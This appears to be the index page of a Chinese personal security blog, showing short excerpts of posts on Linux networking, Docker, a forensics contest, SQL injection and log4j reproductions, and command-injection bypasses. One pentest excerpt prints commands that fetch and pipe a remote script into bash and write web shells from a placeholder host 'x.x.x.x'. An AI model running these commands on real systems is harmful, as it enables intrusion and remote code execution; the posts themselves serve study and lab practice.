Linux的一些个人记录 前言记录一下日常接触到以及学习到的一些关于Linux的知识 网络常见的Linux发行版的网卡配置文件存放位置:1、Ubuntu / Debian: 12/etc/network/interfacessudo systemctl restart networking #重启网络命令 Ubuntu 18.0.4开始,Ubuntu和Debian移除了以前的ifup/ifdown命令和**/etc/n 2024-09-21 Linux
2024FIC第四届全国网络空间取证线上 案情简介2024年4月,卢某报案至警方,声称自己疑似遭受了“杀猪盘”诈骗,大量钱财被骗走。卢某透露,在与某公司交流过程中结识了员工李某。李某私下诱导卢某参与赌博游戏,起初资金出入均属正常。但随后,李某称赌博平台为提升安全性,更换了地址和玩法,转为通过群聊抢红包形式进行赌博。随着赌资不断增加,卢某投入巨额资金后,发现无法再访问该网站,同时李某也失去联系,卢某遂意识到自己被骗。在经济压力下,卢某选择报 2024-07-09 取证
docker使用教程 0x01 获取镜像:1docker pull ubuntu 0x02 启动容器该命令使用Ubuntu镜像启动一个容器: 1docker run -it ubuntu /bin/bash 参数说明 i:交互式操作; -t:终端; ubuntu:ubuntu镜像 /bin/bash:放在镜像名后的是命令,这里我们希望有个交互式shell,因此使用的是/bin/bash 退出终端直接 2023-12-03 docker
Web Based Quiz System v1.0【CVE-2022-32991】复现 一、靶场介绍该CMS的welcome.php中存在SQL注入攻击。 Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。 二、复现过程访问链接发现只有注册和登录两个功能 随意注册一个账号进行登录,登录后的界面如下 根据提示,受影响的文件为welcome.php,对该页面的功能和参数进行调试,在对参数eid输入”‘“时 2023-04-09 漏洞复现
OS-Command-Mark 操作系统命令记录记录一些日常中碰到的一些系统命令,顺便也当是个学习啦~~ LinuxLinux Crontab 定时任务cron介绍 我们经常使用的是crontab命令是cron table的简写,它是cron的配置文件,也可以叫它作业列表,我们可以在以下文件夹内找到相关配置文件。 /var/spoo/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名 2022-08-29 Linux、Windows
python-records 用于记录一些日常中遇到的一些函数和写法吧。 一、从TXT读取每行内容1234567891011121314# 第一种写法,一个列表内含有多个子列表weak_pass = []with open('weak_passwds_v1.txt','r') as f: for line in f: weak_pass.append(list(lin 2022-03-15 python
log4j远程代码执行复现 一、漏洞描述此漏洞由log4j2提供的lookup功能造成,该功能允许开发者通过一些协议读取相应环境中的配置,但在处理数据时未对输入进行严格的判断,从而造成命令注入。 2021-12-13 漏洞复现
Linux命令执行上传恶意文件总结 0x01 curl写文件 1curl -fsSL http://x.x.x.x:8080/test.txt > 1.php 无文件执行命令 1curl -fsSL http://x.x.x.x:8080/test.sh | bash 0x02 wget1wget http://x.x.x.x:8080/shell.txt -O /tmp/x.php 0x03 rcp1rcp root@ 2021-12-10 pentest
命令注入绕过方式总结 前言命令注入是web中常见的漏洞之一 ,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被Linux或Windows系统当作命令执行,一般都会造成严重的危害。 2021-12-09 pentest